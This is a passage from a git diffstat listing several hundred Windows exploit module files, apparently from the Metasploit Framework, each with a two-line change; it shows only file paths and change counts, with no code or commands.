.../exploits/windows/browser/ms08_070_visual_studio_msmask.rb | 2 +- modules/exploits/windows/browser/ms08_078_xml_corruption.rb | 2 +- modules/exploits/windows/browser/ms09_002_memory_corruption.rb | 2 +- modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb | 2 +- modules/exploits/windows/browser/ms09_043_owc_msdso.rb | 2 +- modules/exploits/windows/browser/ms09_072_style_object.rb | 2 +- modules/exploits/windows/browser/ms10_002_aurora.rb | 2 +- modules/exploits/windows/browser/ms10_002_ie_object.rb | 2 +- modules/exploits/windows/browser/ms10_018_ie_behaviors.rb | 2 +- modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb | 2 +- .../exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb | 2 +- modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb | 2 +- .../exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb | 2 +- .../windows/browser/ms10_046_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 2 +- modules/exploits/windows/browser/ms11_003_ie_css_import.rb | 2 +- .../exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb | 2 +- modules/exploits/windows/browser/ms11_081_option.rb | 2 +- modules/exploits/windows/browser/ms11_093_ole32.rb | 2 +- modules/exploits/windows/browser/ms12_004_midi.rb | 2 +- modules/exploits/windows/browser/ms12_037_ie_colspan.rb | 2 +- modules/exploits/windows/browser/ms12_037_same_id.rb | 2 +- modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb | 2 +- .../windows/browser/ms13_022_silverlight_script_object.rb | 2 +- modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb | 2 +- modules/exploits/windows/browser/ms13_055_canchor.rb | 2 +- modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb | 2 +- modules/exploits/windows/browser/ms13_069_caret.rb | 2 +- modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb | 2 +- .../exploits/windows/browser/ms13_090_cardspacesigninhelper.rb | 2 +- modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb | 2 +- modules/exploits/windows/browser/ms14_012_textrange.rb | 2 +- modules/exploits/windows/browser/msvidctl_mpeg2.rb | 2 +- modules/exploits/windows/browser/mswhale_checkforupdates.rb | 2 +- .../exploits/windows/browser/msxml_get_definition_code_exec.rb | 2 +- .../windows/browser/nctaudiofile2_setformatlikesample.rb | 2 +- modules/exploits/windows/browser/nis2004_antispam.rb | 2 +- modules/exploits/windows/browser/nis2004_get.rb | 2 +- modules/exploits/windows/browser/notes_handler_cmdinject.rb | 2 +- .../exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb | 2 +- modules/exploits/windows/browser/novelliprint_callbackurl.rb | 2 +- modules/exploits/windows/browser/novelliprint_datetime.rb | 2 +- modules/exploits/windows/browser/novelliprint_executerequest.rb | 2 +- .../exploits/windows/browser/novelliprint_executerequest_dbg.rb | 2 +- .../exploits/windows/browser/novelliprint_getdriversettings.rb | 2 +- .../windows/browser/novelliprint_getdriversettings_2.rb | 2 +- modules/exploits/windows/browser/novelliprint_target_frame.rb | 2 +- modules/exploits/windows/browser/ntr_activex_check_bof.rb | 2 +- modules/exploits/windows/browser/ntr_activex_stopmodule.rb | 2 +- .../exploits/windows/browser/oracle_autovue_setmarkupmode.rb | 2 +- modules/exploits/windows/browser/oracle_dc_submittoexpress.rb | 2 +- .../windows/browser/oracle_webcenter_checkoutandopen.rb | 2 +- modules/exploits/windows/browser/orbit_connecting.rb | 2 +- modules/exploits/windows/browser/ovftool_format_string.rb | 2 +- modules/exploits/windows/browser/pcvue_func.rb | 2 +- modules/exploits/windows/browser/persits_xupload_traversal.rb | 2 +- modules/exploits/windows/browser/quickr_qp2_bof.rb | 2 +- modules/exploits/windows/browser/real_arcade_installerdlg.rb | 2 +- modules/exploits/windows/browser/realplayer_cdda_uri.rb | 2 +- modules/exploits/windows/browser/realplayer_console.rb | 2 +- modules/exploits/windows/browser/realplayer_import.rb | 2 +- modules/exploits/windows/browser/realplayer_qcp.rb | 2 +- modules/exploits/windows/browser/realplayer_smil.rb | 2 +- modules/exploits/windows/browser/roxio_cineplayer.rb | 2 +- modules/exploits/windows/browser/safari_xslt_output.rb | 2 +- .../windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb | 2 +- .../exploits/windows/browser/sapgui_saveviewtosessionfile.rb | 2 +- .../exploits/windows/browser/siemens_solid_edge_selistctrlx.rb | 2 +- modules/exploits/windows/browser/softartisans_getdrivename.rb | 2 +- modules/exploits/windows/browser/sonicwall_addrouteentry.rb | 2 +- .../browser/symantec_altirisdeployment_downloadandinstall.rb | 2 +- .../windows/browser/symantec_altirisdeployment_runcmd.rb | 2 +- modules/exploits/windows/browser/symantec_appstream_unsafe.rb | 2 +- .../exploits/windows/browser/symantec_backupexec_pvcalendar.rb | 2 +- .../browser/symantec_consoleutilities_browseandsavefile.rb | 2 +- .../exploits/windows/browser/synactis_connecttosynactis_bof.rb | 2 +- .../exploits/windows/browser/systemrequirementslab_unsafe.rb | 2 +- modules/exploits/windows/browser/teechart_pro.rb | 2 +- modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb | 2 +- modules/exploits/windows/browser/trendmicro_extsetowner.rb | 2 +- modules/exploits/windows/browser/trendmicro_officescan.rb | 2 +- modules/exploits/windows/browser/tumbleweed_filetransfer.rb | 2 +- modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb | 2 +- modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb | 2 +- modules/exploits/windows/browser/ultraoffice_httpupload.rb | 2 +- modules/exploits/windows/browser/verypdf_pdfview.rb | 2 +- modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb | 2 +- modules/exploits/windows/browser/vlc_amv.rb | 2 +- modules/exploits/windows/browser/vlc_mms_bof.rb | 2 +- modules/exploits/windows/browser/webdav_dll_hijacker.rb | 2 +- modules/exploits/windows/browser/webex_ucf_newobject.rb | 2 +- .../windows/browser/wellintech_kingscada_kxclientdownload.rb | 2 +- modules/exploits/windows/browser/winamp_playlist_unc.rb | 2 +- modules/exploits/windows/browser/winamp_ultravox.rb | 2 +- modules/exploits/windows/browser/windvd7_applicationtype.rb | 2 +- modules/exploits/windows/browser/winzip_fileview.rb | 2 +- modules/exploits/windows/browser/wmi_admintools.rb | 2 +- .../exploits/windows/browser/x360_video_player_set_text_bof.rb | 2 +- modules/exploits/windows/browser/xmplay_asx.rb | 2 +- modules/exploits/windows/browser/yahoomessenger_fvcom.rb | 2 +- modules/exploits/windows/browser/yahoomessenger_server.rb | 2 +- .../exploits/windows/browser/zenturiprogramchecker_unsafe.rb | 2 +- modules/exploits/windows/browser/zenworks_helplauncher_exec.rb | 2 +- modules/exploits/windows/dcerpc/ms03_026_dcom.rb | 2 +- modules/exploits/windows/dcerpc/ms05_017_msmq.rb | 2 +- modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb | 2 +- modules/exploits/windows/dcerpc/ms07_065_msmq.rb | 2 +- .../exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb | 2 +- modules/exploits/windows/email/ms10_045_outlook_ref_only.rb | 2 +- modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb | 2 +- modules/exploits/windows/emc/alphastor_agent.rb | 2 +- modules/exploits/windows/emc/alphastor_device_manager_exec.rb | 2 +- modules/exploits/windows/emc/networker_format_string.rb | 2 +- modules/exploits/windows/emc/replication_manager_exec.rb | 2 +- modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb | 2 +- modules/exploits/windows/fileformat/abbs_amp_lst.rb | 2 +- modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb | 2 +- modules/exploits/windows/fileformat/acdsee_xpm.rb | 2 +- modules/exploits/windows/fileformat/actfax_import_users_bof.rb | 2 +- modules/exploits/windows/fileformat/activepdf_webgrabber.rb | 2 +- modules/exploits/windows/fileformat/adobe_collectemailinfo.rb | 2 +- modules/exploits/windows/fileformat/adobe_cooltype_sing.rb | 2 +- modules/exploits/windows/fileformat/adobe_flashplayer_button.rb | 2 +- .../windows/fileformat/adobe_flashplayer_newfunction.rb | 2 +- .../windows/fileformat/adobe_flatedecode_predictor02.rb | 2 +- modules/exploits/windows/fileformat/adobe_geticon.rb | 2 +- .../exploits/windows/fileformat/adobe_illustrator_v14_eps.rb | 2 +- modules/exploits/windows/fileformat/adobe_jbig2decode.rb | 2 +- modules/exploits/windows/fileformat/adobe_libtiff.rb | 2 +- modules/exploits/windows/fileformat/adobe_media_newplayer.rb | 2 +- modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb | 2 +- .../exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb | 2 +- modules/exploits/windows/fileformat/adobe_reader_u3d.rb | 2 +- modules/exploits/windows/fileformat/adobe_toolbutton.rb | 2 +- modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb | 2 +- modules/exploits/windows/fileformat/adobe_utilprintf.rb | 2 +- modules/exploits/windows/fileformat/allplayer_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/altap_salamander_pdb.rb | 2 +- modules/exploits/windows/fileformat/aol_desktop_linktag.rb | 2 +- modules/exploits/windows/fileformat/aol_phobos_bof.rb | 2 +- modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb | 2 +- modules/exploits/windows/fileformat/apple_quicktime_texml.rb | 2 +- modules/exploits/windows/fileformat/audio_coder_m3u.rb | 2 +- modules/exploits/windows/fileformat/audio_wkstn_pls.rb | 2 +- modules/exploits/windows/fileformat/audiotran_pls.rb | 2 +- modules/exploits/windows/fileformat/audiotran_pls_1424.rb | 2 +- modules/exploits/windows/fileformat/aviosoft_plf_buf.rb | 2 +- modules/exploits/windows/fileformat/bacnet_csv.rb | 2 +- modules/exploits/windows/fileformat/blazedvd_hdtv_bof.rb | 2 +- modules/exploits/windows/fileformat/blazedvd_plf.rb | 2 +- modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb | 2 +- modules/exploits/windows/fileformat/bsplayer_m3u.rb | 2 +- modules/exploits/windows/fileformat/ca_cab.rb | 2 +- modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb | 2 +- modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb | 2 +- modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb | 2 +- modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb | 2 +- modules/exploits/windows/fileformat/csound_getnum_bof.rb | 2 +- modules/exploits/windows/fileformat/cutezip_bof.rb | 2 +- modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb | 2 +- modules/exploits/windows/fileformat/cytel_studio_cy3.rb | 2 +- modules/exploits/windows/fileformat/deepburner_path.rb | 2 +- modules/exploits/windows/fileformat/destinymediaplayer16.rb | 2 +- modules/exploits/windows/fileformat/digital_music_pad_pls.rb | 2 +- modules/exploits/windows/fileformat/djstudio_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/djvu_imageurl.rb | 2 +- modules/exploits/windows/fileformat/dvdx_plf_bof.rb | 2 +- modules/exploits/windows/fileformat/easycdda_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/emc_appextender_keyworks.rb | 2 +- modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb | 2 +- .../windows/fileformat/erdas_er_viewer_rf_report_error.rb | 2 +- .../exploits/windows/fileformat/esignal_styletemplate_bof.rb | 2 +- modules/exploits/windows/fileformat/etrust_pestscan.rb | 2 +- modules/exploits/windows/fileformat/ezip_wizard_bof.rb | 2 +- modules/exploits/windows/fileformat/fatplayer_wav.rb | 2 +- modules/exploits/windows/fileformat/fdm_torrent.rb | 2 +- modules/exploits/windows/fileformat/feeddemon_opml.rb | 2 +- modules/exploits/windows/fileformat/foxit_reader_filewrite.rb | 2 +- modules/exploits/windows/fileformat/foxit_reader_launch.rb | 2 +- modules/exploits/windows/fileformat/foxit_title_bof.rb | 2 +- modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb | 2 +- modules/exploits/windows/fileformat/galan_fileformat_bof.rb | 2 +- modules/exploits/windows/fileformat/gsm_sim.rb | 2 +- modules/exploits/windows/fileformat/gta_samp.rb | 2 +- modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb | 2 +- modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb | 2 +- modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb | 2 +- modules/exploits/windows/fileformat/homm3_h3m.rb | 2 +- modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb | 2 +- .../exploits/windows/fileformat/ibm_forms_viewer_fontname.rb | 2 +- modules/exploits/windows/fileformat/ibm_pcm_ws.rb | 2 +- modules/exploits/windows/fileformat/icofx_bof.rb | 2 +- modules/exploits/windows/fileformat/ideal_migration_ipj.rb | 2 +- modules/exploits/windows/fileformat/iftp_schedule_bof.rb | 2 +- modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb | 2 +- modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb | 2 +- modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb | 2 +- modules/exploits/windows/fileformat/lattice_pac_bof.rb | 2 +- modules/exploits/windows/fileformat/lotusnotes_lzh.rb | 2 +- modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb | 2 +- .../windows/fileformat/mcafee_hercules_deletesnapshot.rb | 2 +- modules/exploits/windows/fileformat/mcafee_showreport_exec.rb | 2 +- modules/exploits/windows/fileformat/mediacoder_m3u.rb | 2 +- modules/exploits/windows/fileformat/mediajukebox.rb | 2 +- modules/exploits/windows/fileformat/microp_mppl.rb | 2 +- modules/exploits/windows/fileformat/millenium_mp3_pls.rb | 2 +- modules/exploits/windows/fileformat/mini_stream_pls_bof.rb | 2 +- modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb | 2 +- modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb | 2 +- modules/exploits/windows/fileformat/moxa_mediadbplayback.rb | 2 +- modules/exploits/windows/fileformat/mplayer_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/mplayer_sami_bof.rb | 2 +- .../exploits/windows/fileformat/ms09_067_excel_featheader.rb | 2 +- modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb | 2 +- modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb | 2 +- .../exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb | 2 +- .../windows/fileformat/ms11_006_createsizeddibsection.rb | 2 +- modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb | 2 +- modules/exploits/windows/fileformat/ms12_005.rb | 2 +- modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb | 2 +- modules/exploits/windows/fileformat/ms13_071_theme.rb | 2 +- modules/exploits/windows/fileformat/ms14_017_rtf.rb | 2 +- modules/exploits/windows/fileformat/ms14_060_sandworm.rb | 2 +- modules/exploits/windows/fileformat/ms14_064_packager_python.rb | 2 +- .../windows/fileformat/ms14_064_packager_run_as_admin.rb | 2 +- .../windows/fileformat/ms15_020_shortcut_icon_dllloader.rb | 2 +- modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb | 2 +- modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb | 2 +- modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 2 +- .../exploits/windows/fileformat/msworks_wkspictureinterface.rb | 2 +- modules/exploits/windows/fileformat/mymp3player_m3u.rb | 2 +- modules/exploits/windows/fileformat/netop.rb | 2 +- .../exploits/windows/fileformat/nuance_pdf_launch_overflow.rb | 2 +- modules/exploits/windows/fileformat/openoffice_ole.rb | 2 +- .../exploits/windows/fileformat/orbit_download_failed_bof.rb | 2 +- modules/exploits/windows/fileformat/orbital_viewer_orb.rb | 2 +- modules/exploits/windows/fileformat/ovf_format_string.rb | 2 +- modules/exploits/windows/fileformat/proshow_cellimage_bof.rb | 2 +- modules/exploits/windows/fileformat/proshow_load_bof.rb | 2 +- modules/exploits/windows/fileformat/publishit_pui.rb | 2 +- modules/exploits/windows/fileformat/real_networks_netzip_bof.rb | 2 +- .../exploits/windows/fileformat/real_player_url_property_bof.rb | 2 +- .../exploits/windows/fileformat/realplayer_ver_attribute_bof.rb | 2 +- .../exploits/windows/fileformat/safenet_softremote_groupname.rb | 2 +- modules/exploits/windows/fileformat/sascam_get.rb | 2 +- modules/exploits/windows/fileformat/scadaphone_zip.rb | 2 +- .../exploits/windows/fileformat/shadow_stream_recorder_bof.rb | 2 +- modules/exploits/windows/fileformat/somplplayer_m3u.rb | 2 +- .../exploits/windows/fileformat/subtitle_processor_m3u_bof.rb | 2 +- modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb | 2 +- .../exploits/windows/fileformat/total_video_player_ini_bof.rb | 2 +- modules/exploits/windows/fileformat/tugzip.rb | 2 +- modules/exploits/windows/fileformat/ultraiso_ccd.rb | 2 +- modules/exploits/windows/fileformat/ultraiso_cue.rb | 2 +- modules/exploits/windows/fileformat/ursoft_w32dasm.rb | 2 +- modules/exploits/windows/fileformat/varicad_dwb.rb | 2 +- modules/exploits/windows/fileformat/videocharge_studio.rb | 2 +- modules/exploits/windows/fileformat/videolan_tivo.rb | 2 +- modules/exploits/windows/fileformat/videospirit_visprj.rb | 2 +- modules/exploits/windows/fileformat/visio_dxf_bof.rb | 2 +- modules/exploits/windows/fileformat/visiwave_vwr_type.rb | 2 +- modules/exploits/windows/fileformat/vlc_modplug_s3m.rb | 2 +- modules/exploits/windows/fileformat/vlc_realtext.rb | 2 +- modules/exploits/windows/fileformat/vlc_smb_uri.rb | 2 +- modules/exploits/windows/fileformat/vlc_webm.rb | 2 +- modules/exploits/windows/fileformat/vuplayer_cue.rb | 2 +- modules/exploits/windows/fileformat/vuplayer_m3u.rb | 2 +- modules/exploits/windows/fileformat/watermark_master.rb | 2 +- modules/exploits/windows/fileformat/winamp_maki_bof.rb | 2 +- modules/exploits/windows/fileformat/winrar_name_spoofing.rb | 2 +- modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb | 2 +- modules/exploits/windows/fileformat/wireshark_packet_dect.rb | 2 +- modules/exploits/windows/fileformat/wm_downloader_m3u.rb | 2 +- modules/exploits/windows/fileformat/xenorate_xpl_bof.rb | 2 +- modules/exploits/windows/fileformat/xion_m3u_sehbof.rb | 2 +- modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb | 2 +- modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb | 2 +- modules/exploits/windows/firewall/blackice_pam_icq.rb | 2 +- modules/exploits/windows/firewall/kerio_auth.rb | 2 +- modules/exploits/windows/ftp/32bitftp_list_reply.rb | 2 +- modules/exploits/windows/ftp/3cdaemon_ftp_user.rb | 2 +- modules/exploits/windows/ftp/aasync_list_reply.rb | 2 +- modules/exploits/windows/ftp/ability_server_stor.rb | 2 +- modules/exploits/windows/ftp/absolute_ftp_list_bof.rb | 2 +- modules/exploits/windows/ftp/cesarftp_mkd.rb | 2 +- modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb | 2 +- modules/exploits/windows/ftp/dreamftp_format.rb | 2 +- modules/exploits/windows/ftp/easyfilesharing_pass.rb | 2 +- modules/exploits/windows/ftp/easyftp_cwd_fixret.rb | 2 +- modules/exploits/windows/ftp/easyftp_list_fixret.rb | 2 +- modules/exploits/windows/ftp/easyftp_mkd_fixret.rb | 2 +- modules/exploits/windows/ftp/filecopa_list_overflow.rb | 2 +- modules/exploits/windows/ftp/filewrangler_list_reply.rb | 2 +- modules/exploits/windows/ftp/freefloatftp_wbem.rb | 2 +- modules/exploits/windows/ftp/freeftpd_pass.rb | 2 +- modules/exploits/windows/ftp/freeftpd_user.rb | 2 +- modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb | 2 +- modules/exploits/windows/ftp/ftppad_list_reply.rb | 2 +- modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb | 2 +- modules/exploits/windows/ftp/ftpsynch_list_reply.rb | 2 +- modules/exploits/windows/ftp/gekkomgr_list_reply.rb | 2 +- modules/exploits/windows/ftp/globalscapeftp_input.rb | 2 +- modules/exploits/windows/ftp/goldenftp_pass_bof.rb | 2 +- modules/exploits/windows/ftp/httpdx_tolog_format.rb | 2 +- modules/exploits/windows/ftp/kmftp_utility_cwd.rb | 2 +- modules/exploits/windows/ftp/leapftp_list_reply.rb | 2 +- modules/exploits/windows/ftp/leapftp_pasv_reply.rb | 2 +- modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb | 2 +- modules/exploits/windows/ftp/netterm_netftpd_user.rb | 2 +- modules/exploits/windows/ftp/odin_list_reply.rb | 2 +- modules/exploits/windows/ftp/open_ftpd_wbem.rb | 2 +- modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb | 2 +- modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb | 2 +- modules/exploits/windows/ftp/pcman_stor.rb | 2 +- modules/exploits/windows/ftp/proftp_banner.rb | 2 +- modules/exploits/windows/ftp/quickshare_traversal_write.rb | 2 +- modules/exploits/windows/ftp/ricoh_dl_bof.rb | 2 +- modules/exploits/windows/ftp/sami_ftpd_user.rb | 2 +- modules/exploits/windows/ftp/sasser_ftpd_port.rb | 2 +- modules/exploits/windows/ftp/scriptftp_list.rb | 2 +- modules/exploits/windows/ftp/seagull_list_reply.rb | 2 +- modules/exploits/windows/ftp/servu_chmod.rb | 2 +- modules/exploits/windows/ftp/servu_mdtm.rb | 2 +- modules/exploits/windows/ftp/slimftpd_list_concat.rb | 2 +- modules/exploits/windows/ftp/trellian_client_pasv.rb | 2 +- modules/exploits/windows/ftp/turboftp_port.rb | 2 +- modules/exploits/windows/ftp/vermillion_ftpd_port.rb | 2 +- modules/exploits/windows/ftp/warftpd_165_pass.rb | 2 +- modules/exploits/windows/ftp/warftpd_165_user.rb | 2 +- modules/exploits/windows/ftp/wftpd_size.rb | 2 +- modules/exploits/windows/ftp/wing_ftp_admin_exec.rb | 2 +- modules/exploits/windows/ftp/wsftp_server_503_mkd.rb | 2 +- modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb | 2 +- modules/exploits/windows/ftp/xftp_client_pwd.rb | 2 +- modules/exploits/windows/ftp/xlink_client.rb | 2 +- modules/exploits/windows/ftp/xlink_server.rb | 2 +- modules/exploits/windows/games/mohaa_getinfo.rb | 2 +- modules/exploits/windows/games/racer_503beta5.rb | 2 +- modules/exploits/windows/games/ut2004_secure.rb | 2 +- modules/exploits/windows/http/adobe_robohelper_authbypass.rb | 2 +- modules/exploits/windows/http/altn_securitygateway.rb | 2 +- modules/exploits/windows/http/altn_webadmin.rb | 2 +- modules/exploits/windows/http/amlibweb_webquerydll_app.rb | 2 +- modules/exploits/windows/http/apache_chunked.rb | 2 +- modules/exploits/windows/http/apache_mod_rewrite_ldap.rb | 2 +- modules/exploits/windows/http/apache_modjk_overflow.rb | 2 +- modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb | 2 +- modules/exploits/windows/http/badblue_ext_overflow.rb | 2 +- modules/exploits/windows/http/badblue_passthru.rb | 2 +- modules/exploits/windows/http/bea_weblogic_jsessionid.rb | 2 +- modules/exploits/windows/http/bea_weblogic_post_bof.rb | 2 +- modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb | 2 +- modules/exploits/windows/http/belkin_bulldog.rb | 2 +- modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb | 2 +- modules/exploits/windows/http/ca_igateway_debug.rb | 2 +- .../exploits/windows/http/ca_totaldefense_regeneratereports.rb | 2 +- modules/exploits/windows/http/cogent_datahub_command.rb | 2 +- .../exploits/windows/http/cogent_datahub_request_headers_bof.rb | 2 +- modules/exploits/windows/http/coldfusion_fckeditor.rb | 2 +- modules/exploits/windows/http/cyclope_ess_sqli.rb | 2 +- modules/exploits/windows/http/desktopcentral_file_upload.rb | 2 +- .../exploits/windows/http/desktopcentral_statusupdate_upload.rb | 2 +- modules/exploits/windows/http/easyftp_list.rb | 2 +- modules/exploits/windows/http/edirectory_host.rb | 2 +- modules/exploits/windows/http/edirectory_imonitor.rb | 2 +- modules/exploits/windows/http/efs_easychatserver_username.rb | 2 +- modules/exploits/windows/http/efs_fmws_userid_bof.rb | 2 +- modules/exploits/windows/http/ektron_xslt_exec.rb | 2 +- modules/exploits/windows/http/ericom_access_now_bof.rb | 2 +- modules/exploits/windows/http/ezserver_http.rb | 2 +- modules/exploits/windows/http/fdm_auth_header.rb | 2 +- modules/exploits/windows/http/generic_http_dll_injection.rb | 2 +- modules/exploits/windows/http/hp_autopass_license_traversal.rb | 2 +- modules/exploits/windows/http/hp_imc_bims_upload.rb | 2 +- modules/exploits/windows/http/hp_imc_mibfileupload.rb | 2 +- modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb | 2 +- modules/exploits/windows/http/hp_mpa_job_acct.rb | 2 +- modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb | 2 +- modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb | 2 +- modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb | 2 +- modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 2 +- modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 2 +- modules/exploits/windows/http/hp_nnm_openview5.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovas.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebhelp.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb | 2 +- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb | 2 +- modules/exploits/windows/http/hp_nnm_snmp.rb | 2 +- modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb | 2 +- modules/exploits/windows/http/hp_nnm_toolbar_01.rb | 2 +- modules/exploits/windows/http/hp_nnm_toolbar_02.rb | 2 +- modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb | 2 +- modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb | 2 +- modules/exploits/windows/http/hp_openview_insight_backdoor.rb | 2 +- .../exploits/windows/http/hp_pcm_snac_update_certificates.rb | 2 +- modules/exploits/windows/http/hp_pcm_snac_update_domain.rb | 2 +- modules/exploits/windows/http/hp_power_manager_filename.rb | 2 +- modules/exploits/windows/http/hp_power_manager_login.rb | 2 +- modules/exploits/windows/http/hp_sitescope_dns_tool.rb | 2 +- modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb | 2 +- modules/exploits/windows/http/httpdx_handlepeer.rb | 2 +- modules/exploits/windows/http/httpdx_tolog_format.rb | 2 +- modules/exploits/windows/http/ia_webmail.rb | 2 +- modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb | 2 +- modules/exploits/windows/http/ibm_tpmfosd_overflow.rb | 2 +- modules/exploits/windows/http/ibm_tsm_cad_header.rb | 2 +- modules/exploits/windows/http/icecast_header.rb | 2 +- modules/exploits/windows/http/integard_password_bof.rb | 2 +- modules/exploits/windows/http/intersystems_cache.rb | 2 +- modules/exploits/windows/http/intrasrv_bof.rb | 2 +- modules/exploits/windows/http/ipswitch_wug_maincfgret.rb | 2 +- modules/exploits/windows/http/jira_collector_traversal.rb | 2 +- modules/exploits/windows/http/kaseya_uploader.rb | 2 +- modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb | 2 +- modules/exploits/windows/http/kolibri_http.rb | 2 +- .../exploits/windows/http/landesk_thinkmanagement_upload_asp.rb | 2 +- modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb | 2 +- modules/exploits/windows/http/mailenable_auth_header.rb | 2 +- modules/exploits/windows/http/manage_engine_opmanager_rce.rb | 2 +- modules/exploits/windows/http/manageengine_apps_mngr.rb | 2 +- .../exploits/windows/http/manageengine_connectionid_write.rb | 2 +- modules/exploits/windows/http/maxdb_webdbm_database.rb | 2 +- modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb | 2 +- modules/exploits/windows/http/mcafee_epolicy_source.rb | 2 +- modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb | 2 +- modules/exploits/windows/http/minishare_get_overflow.rb | 2 +- modules/exploits/windows/http/miniweb_upload_wbem.rb | 2 +- modules/exploits/windows/http/navicopa_get_overflow.rb | 2 +- modules/exploits/windows/http/netdecision_http_bof.rb | 2 +- modules/exploits/windows/http/novell_imanager_upload.rb | 2 +- modules/exploits/windows/http/novell_mdm_lfi.rb | 2 +- modules/exploits/windows/http/novell_messenger_acceptlang.rb | 2 +- modules/exploits/windows/http/nowsms.rb | 2 +- modules/exploits/windows/http/oracle9i_xdb_pass.rb | 2 +- modules/exploits/windows/http/oracle_beehive_evaluation.rb | 2 +- .../exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb | 2 +- modules/exploits/windows/http/oracle_btm_writetofile.rb | 2 +- modules/exploits/windows/http/oracle_endeca_exec.rb | 2 +- modules/exploits/windows/http/oracle_event_processing_upload.rb | 2 +- modules/exploits/windows/http/osb_uname_jlist.rb | 2 +- modules/exploits/windows/http/peercast_url.rb | 2 +- modules/exploits/windows/http/php_apache_request_headers_bof.rb | 2 +- modules/exploits/windows/http/privatewire_gateway.rb | 2 +- modules/exploits/windows/http/psoproxy91_overflow.rb | 2 +- modules/exploits/windows/http/rabidhamster_r4_log.rb | 2 +- modules/exploits/windows/http/rejetto_hfs_exec.rb | 2 